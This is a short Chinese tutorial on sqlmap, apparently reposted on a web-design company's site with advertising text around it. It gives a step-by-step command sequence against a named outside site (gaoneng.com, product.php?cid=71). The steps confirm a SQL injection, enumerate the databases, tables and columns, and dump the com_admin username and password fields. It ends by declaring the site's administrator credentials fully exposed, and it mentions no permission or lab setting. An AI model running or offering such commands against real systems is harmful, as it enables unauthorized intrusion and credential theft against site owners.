用sqlmap進行注入

十載的雙臺子網站建設經驗，針對設計、前端、開發、售后、文案、推廣等六對一服務，響應快，48小時及時工作處理。成都營銷網站建設的優勢是能夠根據用戶設備顯示端的尺寸不同，自動調整雙臺子建站的顯示方式，使網站能夠適用不同顯示終端，在瀏覽器中調整網站的寬度，無論在任何一種瀏覽器上瀏覽網站，都能展現優雅布局與設計，從而大程度地提升瀏覽體驗。成都創新互聯從事“雙臺子網站設計”,“雙臺子網站推廣”以來，每個客戶項目都認真落實執行。

1、用掃描工具可以掃出注入點這里我用一個注入點進行說明。

sqlamp.py -u“http://www.gaoneng.com/product.php?cid=71”

 

可以看出此處存在sql注入漏洞。

2、

sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

--dbs 可以跑出存在的數據庫名

 

然后可以跑gaoneng數據庫中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables

 

既然已經爆出數據庫里的表，那就可以爆出表中的字段

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

-D gaoneng -T com_admin --columns

 

可以看到這個表中存在我們需要的字段，密碼與用戶名

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71” 

-D gaoneng -T com_admin -C username,password --dump

 

由此這個網站的管理員密碼與用戶名已被完全爆出。

文章標題：sqlmap的使用
本文路徑：http://m.newbst.com/article26/jeipjg.html

成都網站建設公司_創新互聯，為您提供網站設計、做網站、外貿建站、企業網站制作、ChatGPT、Google

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯